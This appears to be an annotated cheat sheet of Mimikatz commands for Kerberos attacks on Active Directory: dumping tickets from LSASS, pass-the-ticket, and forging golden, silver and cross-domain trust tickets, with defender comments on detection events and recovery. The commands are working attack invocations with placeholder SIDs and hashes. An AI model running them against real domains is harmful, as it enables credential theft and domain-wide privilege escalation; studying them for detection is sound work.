Kerberos Attacks
Pass-the-Ticket (PtT)
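# Export all Kerberos tickets held in LSASS memory to .kirbi files (needs local admin / debug rights)
# Defender view: this is an LSASS memory read, the access that EDR, LSA protection and Credential Guard are meant to block or flag.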
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
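# Inject a previously exported ticket into the current logon session
# Detection lead: the same ticket being presented from a host other than the one it was issued to.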
Invoke-Mimikatz -Command '"kerberos::ptt c:\temp\ticket.kirbi"'
# Purge all tickets from the current logon session (built-in equivalent: klist purge)
Invoke-Mimikatz -Command '"kerberos::purge"'
Golden Ticket
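# Create Golden Ticket: a TGT forged offline with the krbtgt key (HASH and S-1-5-21-XXX are placeholders)
# No AS-REQ reaches the DC, so detection leads are service-ticket requests (event 4769) with no matching TGT issuance (4768)
# and ticket lifetimes longer than the domain's Kerberos policy allows. Recovery after krbtgt exposure means resetting the krbtgt password twice.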
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /ptt"'
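# Custom groups: /groups sets the group RIDs written into the forged PAC
# (512 Domain Admins, 513 Domain Users, 518 Schema Admins, 519 Enterprise Admins, 520 Group Policy Creator Owners).
# A ticket naming a user/RID pair that does not exist in the directory is a useful detection signal.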
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:FakeAdmin /id:1337 /groups:512,513,518,519,520 /ptt
Silver Ticket
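# CIFS - File access
# A silver ticket is a service ticket forged with the target service account's own key (/rc4), not the krbtgt key.
# No DC is contacted when it is made or used, so DC-side 4768/4769 events are absent; detection has to come from the target host's logon events.
# Regular machine/service account password rotation limits how long a stolen key stays valid.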
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:cifs /rc4:HASH /user:admin /ptt
# HOST - WMI/PSRemoting
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:HOST /rc4:HASH /user:admin /ptt
# LDAP - Directory queries
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:ldap /rc4:HASH /user:admin /ptt
Trust Tickets
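# Cross-domain access (child domain -> another domain in the forest)
# Note: as written this is signed with the child domain's krbtgt key and uses /sids to add an extra SID (RID 519 = Enterprise Admins),
# i.e. a golden ticket with SID history rather than a ticket forged with the inter-realm trust key. /ticket saves it to a file instead of injecting it.
# Defender view: SID filtering is not applied between domains of the same forest, so the forest, not the domain, is the security boundary;
# compromise of any child domain's krbtgt key should be handled as a forest-wide incident.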
Invoke-Mimikatz -Command '"kerberos::golden /domain:child.local /sid:S-1-5-21-XXX /sids:S-1-5-21-YYY-519 /krbtgt:HASH /user:Administrator /ticket:trust.kirbi"'